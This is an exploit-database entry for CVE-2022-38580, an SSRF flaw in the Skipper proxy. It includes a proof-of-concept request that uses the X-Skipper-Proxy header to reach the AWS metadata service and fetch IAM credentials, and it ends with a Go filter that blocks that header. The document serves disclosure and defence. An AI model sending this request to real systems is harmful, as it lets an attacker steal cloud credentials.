

[remote] X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)
source link: https://www.exploit-db.com/exploits/51111
#Exploit Title: X-Skipper-Proxy v0.13.237 - Server Side Request Forgery (SSRF)
#Date: 24/10/2022
#Exploit Author: Hosein Vita & Milad Fadavvi
#Vendor Homepage: https://github.com/zalando/skipper
#Software Link: https://github.com/zalando/skipper
#Version: < v0.13.237
#Tested on: Linux
#CVE: CVE-2022-38580
Summary:
Skipper prior to version v0.13.236 is vulnerable to server-side request forgery (SSRF). An attacker can exploit a vulnerable version of the proxy to reach the internal metadata server or other unauthenticated URLs by adding a specific header (X-Skipper-Proxy) to the HTTP request.
Proof Of Concept:
1- Add the "X-Skipper-Proxy" header to your request
2- Put the AWS metadata path in the request path
GET /latest/meta-data/iam/security-credentials HTTP/1.1
Host: yourskipperdomain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
X-Skipper-Proxy: http://169.254.169.254
Connection: close
Reference:
https://github.com/zalando/skipper/security/advisories/GHSA-f2rj-m42r-6jm2
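As an added defensive example (not the project's own patch or code), the Go edge filter below refuses any client-supplied X-Skipper-Proxy header before the request reaches the proxy and logs the attempt, flagging overrides aimed at link-local, loopback or RFC 1918 addresses separately for alerting. The function names, the 400 response and the fail-closed handling of non-literal hosts are assumptions of this example, not Skipper's actual fix.

```go
package main

import (
	"log"
	"net"
	"net/http"
	"net/url"
	"strings"
)

const proxyHeader = "X-Skipper-Proxy" // the advisory's client-controlled upstream override

// isInternalTarget reports whether the override points at a literal loopback,
// link-local (169.254.0.0/16 holds the cloud metadata endpoint), RFC 1918 or
// unspecified address; non-literal hosts count as internal (assumption:
// resolving them here would reopen a DNS-based bypass).
func isInternalTarget(raw string) bool {
	u, err := url.Parse(raw)
	if err != nil || u.Host == "" {
		return true // unparsable override: fail closed
	}
	ip := net.ParseIP(u.Hostname())
	return ip == nil || ip.IsLoopback() || ip.IsLinkLocalUnicast() || ip.IsPrivate() || ip.IsUnspecified()
}

// InspectOverride returns (blocked, reason): every client-supplied override is
// blocked, and the reason marks internal targets so alerts can be prioritised.
func InspectOverride(h http.Header) (bool, string) {
	v := strings.TrimSpace(h.Get(proxyHeader))
	if v == "" {
		return false, ""
	}
	if isInternalTarget(v) {
		return true, "upstream override to internal address: " + v
	}
	return true, "client-supplied upstream override: " + v
}

// RejectOverride is edge middleware: requests carrying the header are logged
// with the client address and answered with 400 before reaching the proxy.
func RejectOverride(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if blocked, reason := InspectOverride(r.Header); blocked {
			log.Printf("blocked %s %s from %s: %s", r.Method, r.URL.Path, r.RemoteAddr, reason)
			http.Error(w, "forbidden header", http.StatusBadRequest)
			return
		}
		next.ServeHTTP(w, r)
	})
}
```

Wrap the proxy's inbound handler as `RejectOverride(handler)`; if the header is needed for trusted internal callers, apply the filter only on the untrusted listener.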